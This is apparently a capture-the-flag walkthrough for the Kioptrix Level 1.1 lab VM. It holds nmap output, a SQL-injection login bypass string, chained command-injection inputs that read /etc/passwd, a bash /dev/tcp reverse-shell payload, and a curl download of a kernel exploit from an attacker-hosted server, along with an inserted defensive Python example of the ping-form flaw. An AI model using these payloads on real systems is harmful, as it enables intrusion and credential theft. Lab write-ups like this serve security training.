KIOPTRIX Level 1.1 (#2)
Scanning
We first need to get the target IP. In my case the VM's network setting was bridged, so I ran sudo netdiscover
to catch all IPs on my network => the Kioptrix IP is 192.168.1.6
You can also use nmap with the -sP flag to find the IP.
nmap
sudo nmap -sV -p- -O -T4 192.168.1.7
-sV: determine service/version info
-T4: faster execution
-p-: scan all ports
-O: identify Operating System
sudo nmap -p- -T4 -O -A 192.168.1.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-19 06:35 EDT
Nmap scan report for 192.168.1.6
Host is up (0.00090s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 843/udp status
|_ 100024 1 846/tcp status
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_ssl-date: 2021-07-19T07:27:09+00:00; -3h09m42s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
846/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.2
OS details: Linux 3.2
Network Distance: 2 hops

Host script results:
|_clock-skew: -3h09m42s

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.12 ms 172.16.129.2
2 0.14 ms 192.168.1.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.23 seconds

Let's take a look at port 80.

We find an administrator login form.
Let's try SQLi:
username: administrator password: ' or ''='
After login we find a ping utility.

Gaining a Foothold
OS command injection
ping 192.168.1.8 && whoami
Output: ping 1.1.1.1 & whoami apache
Let's try to read /etc/passwd:
ping 192.168.1.8 && cat /etc/passwd
Get host info
ping 192.168.1.8 & uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
Create a shell session
Set up a netcat listener with:
nc -lvp 4444
Using the payload
; bash -i >& /dev/tcp/kioptrix/4444 0>&1
in the ping form, I was able to create a reverse shell. Now we have a shell as the apache user.
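The ping form's command injection, modeled from the defender's side as an added example (not the Kioptrix application's own code, whose PHP is not shown on this page): the vulnerable string-splicing design beside a hardened one that validates the target as an IP literal and runs ping without a shell. The function names and the `-c 3` count are my assumptions.

```python
"""Added defender-side model of the Kioptrix 2 ping form bug.

Example code, not the VM's own PHP (which is not on this page).
The vulnerable design splices the submitted host into one shell string;
the hardened design validates it as an IP literal and avoids the shell.
"""
import ipaddress
import subprocess
from typing import List

# Characters that let the shell end one command and start another.
SHELL_META = set(";&|`$()<>\n")


def unsafe_ping_command(target: str) -> str:
    """Vulnerable pattern: the result would be handed to `sh -c` (shell=True),
    so `192.168.1.8 && whoami` runs whoami as the web server user."""
    return f"ping -c 3 {target}"


def contains_shell_metachar(command: str) -> bool:
    """Detection helper: does a shell-bound string carry chaining characters?
    Handy for flagging suspicious form submissions in request logs."""
    return any(ch in SHELL_META for ch in command)


def safe_ping_argv(target: str) -> List[str]:
    """Hardened pattern: accept only a single IPv4/IPv6 literal and build an
    argv list. Anything else (hostnames included, by this design) is rejected
    with ValueError before any process is started."""
    try:
        addr = ipaddress.ip_address(target.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ping target: {target!r}") from exc
    return ["ping", "-c", "3", str(addr)]


def run_ping(target: str) -> subprocess.CompletedProcess:
    """Execute the hardened form with shell=False: each argv element reaches
    ping verbatim, so metacharacters can never be reinterpreted."""
    return subprocess.run(safe_ping_argv(target),
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Constructed inputs: the page's injection payload and a clean address.
    for submitted in ("192.168.1.8 && whoami", "192.168.1.8"):
        cmd = unsafe_ping_command(submitted)
        print(f"{cmd!r}: chains commands = {contains_shell_metachar(cmd)}")
        try:
            print("hardened argv:", safe_ping_argv(submitted))
        except ValueError as err:
            print("hardened:", err)
```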
---
Privilege Escalation
Find Exploit
From searchsploit we find this:
Let's take a copy of: Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4) | linux_x86/local/9542.c
Create a Python SimpleHTTPServer to serve the file (the Python 3 command is a bit different).
On the target machine, in our open shell session, pull the exploit file with curl: curl http://192.168.1.8:8080/9545.c --output /tmp/9545.c
Note: We're storing the file in /tmp, as we might run into permission issues storing and accessing files in other directories.
Use ls -la /tmp to verify the file exists.

Root Access